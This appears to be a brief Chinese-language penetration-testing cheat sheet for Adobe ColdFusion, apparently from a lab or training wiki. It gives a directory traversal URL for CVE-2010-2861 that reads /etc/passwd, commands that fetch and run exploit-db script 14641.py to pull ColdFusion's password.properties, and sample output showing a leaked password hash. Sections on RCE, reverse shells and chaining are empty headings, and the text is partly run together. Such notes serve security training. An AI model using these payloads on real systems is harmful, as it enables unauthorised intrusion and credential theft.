ColdFusion
🔍 1. 發現點
searchsploit adobe coldfusion
🚀 2. 測試Payload
📂 目錄遍歷 (CVE-2010-2861)
http://www.example.com/CFIDE/administrator/settings/mappings.cfm?locale=../../../../../etc/passwdsearchsploit -p 14641 cp /usr/share/exploitdb/exploits/multiple/remote/14641.py . python2 14641.py 10.129.204.230 8500 "../../../../../../../../ColdFusion8/lib/password.properties"txt複製編輯rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true
💀 RCE (CVE-2009-2265)
🎯 3. 取得反向 Shell
🔗 5. 連鎖漏洞
最后更新于
这有帮助吗?